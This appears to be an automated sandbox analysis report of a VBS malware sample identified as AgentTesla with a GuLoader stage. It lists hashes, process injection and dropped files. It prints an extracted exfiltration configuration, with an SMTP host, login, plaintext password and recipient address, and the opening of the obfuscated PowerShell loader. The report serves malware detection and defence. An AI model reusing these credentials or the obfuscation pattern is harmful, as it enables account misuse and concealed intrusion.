Analysis

Max time kernel: 146s
Max time network: 128s
Platform: windows7_x64
Resource: win7-20240319-en
Resource tags: arch:x64, arch:x86, image:win7-20240319-en, locale:en-us, os:windows7-x64, system
Submitted: 18-04-2024 01:57
Static task: static1
Behavioral task: behavioral1
  Sample: 26b773de9b887b31c238e4baf440618acce9e0a277c3ebefd5e0c26f61a8e53c.vbs
  Resource: win7-20240319-en
Behavioral task: behavioral2
  Sample: 26b773de9b887b31c238e4baf440618acce9e0a277c3ebefd5e0c26f61a8e53c.vbs
  Resource: win10v2004-20240412-en
General

Target: 26b773de9b887b31c238e4baf440618acce9e0a277c3ebefd5e0c26f61a8e53c.vbs
Size: 210KB
MD5: cc706991e70caa76595bf08fc59bc6a1
SHA1: 1172135bb6eafef9633db0ae5f818366a1515e8a
SHA256: 26b773de9b887b31c238e4baf440618acce9e0a277c3ebefd5e0c26f61a8e53c
SHA512: 3528e82039587e51e9d2e96a99f76941e4077161a3782b3fe4fd0cb7d7f2125a0844554e77c6de7408a0ee3da02e487ec1746465c9f0a3c30222e78a1093e476
SSDEEP: 6144:DYBgIjQvrMbWSR4WHUJJs9E87Fy4lZrUChpqKmjum4QlNVrDjXR46cCPCRJfkqZD:A2dOB2mTJ
Malware Config

Extracted: agenttesla
Protocol: smtp
Host: mail.bresciagrameen.lk
Port: 587
Username: info@bresciagrameen.lk
Password: #S413vT0u45#
Email To: officejay@yandex.com
Signatures

- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Guloader, Cloudeye
  A shellcode-based downloader first seen in 2020.
- Blocklisted process makes network request (3 IoCs)
  Processes (flow, pid, process):
    3  1932  WScript.exe
    5  2984  powershell.exe
    7  2984  powershell.exe
- Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  Processes: 2180 wab.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes: 2560 powershell.exe; 2180 wab.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes: PID 2560 powershell.exe set thread context of 2180 wab.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: 2984 powershell.exe; 2560 powershell.exe (2 events); 2180 wab.exe (2 events)
- Suspicious behavior: MapViewOfSection (1 IoC)
  Processes: 2560 powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes (Token: SeDebugPrivilege): 2984 powershell.exe; 2560 powershell.exe; 2180 wab.exe
- Suspicious use of WriteProcessMemory (20 IoCs)
  Processes (source pid/process -> target pid/process, number of write events):
    1932 WScript.exe    -> 2984 powershell.exe  (3)
    2984 powershell.exe -> 2520 cmd.exe         (3)
    2984 powershell.exe -> 2560 powershell.exe  (4)
    2560 powershell.exe -> 2476 cmd.exe         (4)
    2560 powershell.exe -> 2180 wab.exe         (6)
Processes

WScript.exe (PID 1932)
  C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\26b773de9b887b31c238e4baf440618acce9e0a277c3ebefd5e0c26f61a8e53c.vbs"
  - Blocklisted process makes network request
  - Suspicious use of WriteProcessMemory
  powershell.exe (PID 2984)
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$gevandter = 1;$Versifiable='Substrin';$Versifiable+='g';Function Rivalitet($Slavistens){$Vitiliginous=$Slavistens.Length-$gevandter;For($Forndenhedernes=5; $Forndenhedernes -lt $Vitiliginous; $Forndenhedernes+=(6)){$Sandaflejringerne+=$Slavistens.$Versifiable.Invoke($Forndenhedernes, $gevandter);}$Sandaflejringerne;}function Snkloddene($Bypladser){& ($Pimple) ($Bypladser);} [remainder of the obfuscated script, consisting of padded string literals decoded by Rivalitet, omitted]"
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    cmd.exe (PID 2520)
      C:\Windows\system32\cmd.exe
      Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Wommala.Gly && echo $"
    powershell.exe (PID 2560, 32-bit SysWOW64 instance)
      C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" followed by the same obfuscated script argument that was passed to the 64-bit powershell.exe (PID 2984) [omitted]
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      cmd.exe (PID 2476)
        C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Wommala.Gly && echo $"
      wab.exe (PID 2180)
        C:\Program Files (x86)\windows mail\wab.exe
        Command line: "C:\Program Files (x86)\windows mail\wab.exe"
        - Suspicious use of NtCreateThreadExHideFromDebugger
        - Suspicious use of NtSetInformationThreadHideFromDebugger
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Downloads

- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
  Filesize: 68KB
  MD5: 29f65ba8e88c063813cc50a4ea544e93
  SHA1: 05a7040d5c127e68c25d81cc51271ffb8bef3568
  SHA256: 1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
  SHA512: e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
- C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
  Filesize: 344B
  MD5: 36bd487545db71f52f4d1268b1018514
  SHA1: 16b31bad0faba294b2b7d163a4da9af1aba93423
  SHA256: e4f9f8579cd7ad06b33ed98b7ca48b79cec786fa110e58a66c29669f741c4f89
  SHA512: d11837be3adc8df8de0fc0bf54c86d77e206eb37876550d925666d44badcb9132b1f2aa9919448e40e39e477f9cdf1569e73d0938d6e7f74981a72d92b0173a8
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XP9363EIQG3YCD1J3MN7.temp
  Filesize: 7KB
  MD5: dd7f9c7261122e744e4c22ffafff0964
  SHA1: 71cfba8e51742d02c730303ab40823a10f91aa79
  SHA256: 5c068278d2ad9a1ba90e6cc084f7cf2355156d023428758716bb21f3446c7953
  SHA512: 76569d4f6bd8a227eddec2f94d9a84953f89117a5c7f68a2754afff9eb6b60c58582acae958682d4dd91d484e2846626be5c22ca4cc3c2ac22ac760712c0eac3
- C:\Users\Admin\AppData\Roaming\Wommala.Gly
  Filesize: 466KB
  MD5: 857ebc337f5b8e4103e4ba6bb5eac6b6
  SHA1: fc0153dd335c59293a2a2fb3455fb05b59253bd2
  SHA256: fbef3e8ddfb38a27db63e01cd92e02a59b163f6088ced67c3e4b01f16c5e53e2
  SHA512: b26df0793d9763e9e88bd59e34a5187d7b48101a91647b312b8212b15ab7227327df7913f0c03dd2c9cfff4cb1c99c4846cf88431e09ffe9cdfcc201e9f304f5
- memory/2180-91-0x00000000009B0000-0x00000000009F2000-memory.dmp  Filesize: 264KB
- memory/2180-90-0x000000006E790000-0x000000006EE7E000-memory.dmp  Filesize: 6.9MB
- memory/2180-54-0x0000000001A20000-0x0000000002B19000-memory.dmp  Filesize: 17.0MB
- memory/2180-85-0x0000000076EA0000-0x0000000076F76000-memory.dmp  Filesize: 856KB
- memory/2180-84-0x00000000009B0000-0x0000000001A12000-memory.dmp  Filesize: 16.4MB
- memory/2180-83-0x0000000001A20000-0x0000000002B19000-memory.dmp  Filesize: 17.0MB
- memory/2180-92-0x0000000020C20000-0x0000000020C60000-memory.dmp  Filesize: 256KB
- memory/2180-95-0x000000006E790000-0x000000006EE7E000-memory.dmp  Filesize: 6.9MB
- memory/2180-96-0x0000000020C20000-0x0000000020C60000-memory.dmp  Filesize: 256KB
- memory/2180-58-0x00000000009B0000-0x0000000001A12000-memory.dmp  Filesize: 16.4MB
- memory/2180-57-0x0000000076EA0000-0x0000000076F76000-memory.dmp  Filesize: 856KB
- memory/2180-56-0x0000000076ED6000-0x0000000076ED7000-memory.dmp  Filesize: 4KB
- memory/2180-55-0x0000000076CB0000-0x0000000076E59000-memory.dmp  Filesize: 1.7MB
- memory/2560-35-0x00000000025B0000-0x00000000025F0000-memory.dmp  Filesize: 256KB
- memory/2560-87-0x0000000006030000-0x0000000007129000-memory.dmp  Filesize: 17.0MB
- memory/2560-43-0x00000000050B0000-0x00000000050B1000-memory.dmp  Filesize: 4KB
- memory/2560-44-0x0000000006030000-0x0000000007129000-memory.dmp  Filesize: 17.0MB
- memory/2560-45-0x0000000072CF0000-0x000000007329B000-memory.dmp  Filesize: 5.7MB
- memory/2560-46-0x00000000025B0000-0x00000000025F0000-memory.dmp  Filesize: 256KB
- memory/2560-47-0x0000000006030000-0x0000000007129000-memory.dmp  Filesize: 17.0MB
- memory/2560-50-0x0000000005BD0000-0x0000000005CD0000-memory.dmp  Filesize: 1024KB
- memory/2560-51-0x0000000076CB0000-0x0000000076E59000-memory.dmp  Filesize: 1.7MB
- memory/2560-52-0x0000000076EA0000-0x0000000076F76000-memory.dmp  Filesize: 856KB
- memory/2560-53-0x0000000006030000-0x0000000007129000-memory.dmp  Filesize: 17.0MB
- memory/2560-41-0x00000000025B0000-0x00000000025F0000-memory.dmp  Filesize: 256KB
- memory/2560-42-0x0000000005BD0000-0x0000000005CD0000-memory.dmp  Filesize: 1024KB
- memory/2560-86-0x0000000072CF0000-0x000000007329B000-memory.dmp  Filesize: 5.7MB
- memory/2560-31-0x0000000072CF0000-0x000000007329B000-memory.dmp  Filesize: 5.7MB
- memory/2560-32-0x00000000025B0000-0x00000000025F0000-memory.dmp  Filesize: 256KB
- memory/2560-33-0x00000000025B0000-0x00000000025F0000-memory.dmp  Filesize: 256KB
- memory/2984-34-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp  Filesize: 9.6MB
- memory/2984-21-0x000000001B270000-0x000000001B552000-memory.dmp  Filesize: 2.9MB
- memory/2984-37-0x00000000028E0000-0x0000000002960000-memory.dmp  Filesize: 512KB
- memory/2984-38-0x00000000028E0000-0x0000000002960000-memory.dmp  Filesize: 512KB
- memory/2984-39-0x00000000028E0000-0x0000000002960000-memory.dmp  Filesize: 512KB
- memory/2984-40-0x00000000028E0000-0x0000000002960000-memory.dmp  Filesize: 512KB
- memory/2984-88-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp  Filesize: 9.6MB
- memory/2984-26-0x00000000028E0000-0x0000000002960000-memory.dmp  Filesize: 512KB
- memory/2984-25-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp  Filesize: 9.6MB
- memory/2984-24-0x00000000028E0000-0x0000000002960000-memory.dmp  Filesize: 512KB
- memory/2984-23-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp  Filesize: 9.6MB
- memory/2984-22-0x00000000023A0000-0x00000000023A8000-memory.dmp  Filesize: 32KB